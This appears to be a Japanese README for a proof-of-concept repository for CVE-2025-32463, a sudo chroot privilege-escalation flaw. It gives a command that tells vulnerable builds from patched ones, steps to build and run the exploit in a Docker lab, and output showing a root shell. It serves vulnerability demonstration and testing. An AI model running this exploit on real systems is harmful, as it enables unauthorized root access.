
chwoot PoCのC再実装
このリポジトリは、sudo の chroot 機能における CVE‑2025‑32463 特権昇格の脆弱性を実証するための最小限の再現環境を提供します。
ほとんどのLinuxディストリビューションにおいて、sudo 1.9.14 から 1.9.17(すべてのp‑リビジョン)までの脆弱なビルドが影響を受けます。
セキュリティページ
| ファイル | 目的 |
|---|---|
| Dockerfile | 脆弱な sudo 1.9.16p2 とビルドツールを含む Ubuntu 24.04 イメージを構築します |
| sudo‑chwoot.sh | chroot 内で root シェルを起動する概念実証エクスプロイト |
| run.sh | イメージを(必要に応じて)ビルドし、エクスプロイトコンテナを起動するヘルパースクリプト |
# 脆弱な sudo
poc ~ $ sudo -R woot woot
sudo: woot: No such file or directory
# パッチ適用済みの sudo
poc ~ $ sudo -R woot woot
[sudo] password for poc:
sudo: you are not permitted to use the -R option with woot
# 1 – リポジトリをクローン
$ git clone https://github.com/vpr-labs/CVE-2025-32463.git
$ cd CVE-2025-32463
# 2 – Docker イメージをビルドして実行(タグ "vpr-chwoot" で)
$ ./run.sh
# 3 – コンテナ内でエクスプロイトを実行(root コマンドを直接実行)
poc@f722d9182d1f:~$ make && ./vpr-chwoot
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(poc)
root@f722d9182d1f:/#
run.sh は --privileged と --rm を Docker に渡すため、終了時にコンテナは自動的にクリーンアップされます。
完了したらイメージを削除します:
docker rmi vpr-chwoot